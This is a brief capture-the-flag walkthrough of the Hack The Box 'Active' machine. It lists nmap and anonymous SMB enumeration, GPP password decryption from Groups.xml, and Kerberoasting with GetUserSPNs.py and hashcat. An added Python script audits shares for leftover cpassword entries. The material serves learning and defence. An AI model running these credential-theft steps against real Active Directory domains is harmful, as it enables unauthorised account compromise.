HTB Active Box Walkthrough
Step-by-step walkthrough of the Active box from Hack The Box.
HTB, Active Directory, Kerberoasting
Detailed walkthrough of exploiting the Active machine on Hack The Box.
Reconnaissance
nmap -sC -sV -oA active 10.10.10.100
Key findings:
- SMB shares accessible
- Active Directory domain
- Kerberos authentication
Initial Access
SMB Enumeration
smbclient -L //10.10.10.100 -N
smbclient //10.10.10.100/Replication -N
Found an interesting file: Groups.xml, which contains an encrypted password.
GPP Password Decryption
gpp-decrypt [encrypted_password]
Privilege Escalation
Kerberoasting Attack
GetUserSPNs.py -request -dc-ip 10.10.10.100 active.htb/SVC_TGS
Crack the TGS ticket with hashcat.
Lessons Learned
- Always enumerate SMB shares thoroughly
- GPP passwords are a common finding in older AD environments
- Kerberoasting is effective against service accounts
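An added example, not part of the original walkthrough: a defender-side audit for the GPP lesson above. It walks a copy of a share (such as the Replication share seen here) and reports which Group Policy Preferences files still carry a non-empty cpassword attribute. The sample Groups.xml, the directory layout and the names audit_gpp_tree and demo are constructed for illustration.

```python
import tempfile
import xml.etree.ElementTree as ET
from pathlib import Path

# Group Policy Preferences files that can carry a cpassword attribute.
GPP_FILES = {"groups.xml", "services.xml", "scheduledtasks.xml",
             "datasources.xml", "printers.xml", "drives.xml"}

# Constructed sample modelled on Groups.xml; the cpassword value is a placeholder.
SAMPLE_GROUPS_XML = """<Groups>
  <User name="active.htb\\SVC_TGS">
    <Properties action="U" cpassword="CONSTRUCTED-PLACEHOLDER" userName="active.htb\\SVC_TGS"/>
  </User>
  <User name="active.htb\\clean_account">
    <Properties action="U" cpassword="" userName="active.htb\\clean_account"/>
  </User>
</Groups>
"""


def audit_gpp_tree(root):
    """Return (path, account) per GPP element with a non-empty cpassword; never the value."""
    findings = []
    for path in sorted(Path(root).rglob("*")):
        if not path.is_file() or path.name.lower() not in GPP_FILES:
            continue
        try:
            tree = ET.parse(str(path))
        except ET.ParseError:
            findings.append((str(path), "<unparseable XML, review manually>"))
            continue
        for elem in tree.iter():
            if elem.get("cpassword"):  # an empty attribute means no stored secret
                findings.append((str(path), elem.get("userName", "<unknown>")))
    return findings


def demo():
    """Write the constructed sample into a temporary tree and audit it."""
    with tempfile.TemporaryDirectory() as tmp:
        target = Path(tmp, "Preferences", "Groups")
        target.mkdir(parents=True)
        (target / "Groups.xml").write_text(SAMPLE_GROUPS_XML, encoding="utf-8")
        return [(Path(p).relative_to(tmp).as_posix(), a) for p, a in audit_gpp_tree(tmp)]


if __name__ == "__main__":
    for path, account in demo():
        print(f"cpassword present in {path} (account: {account})")
```

Every account this reports needs its password rotated and the preference item removed from the policy, since the file is readable by anyone who can reach the share.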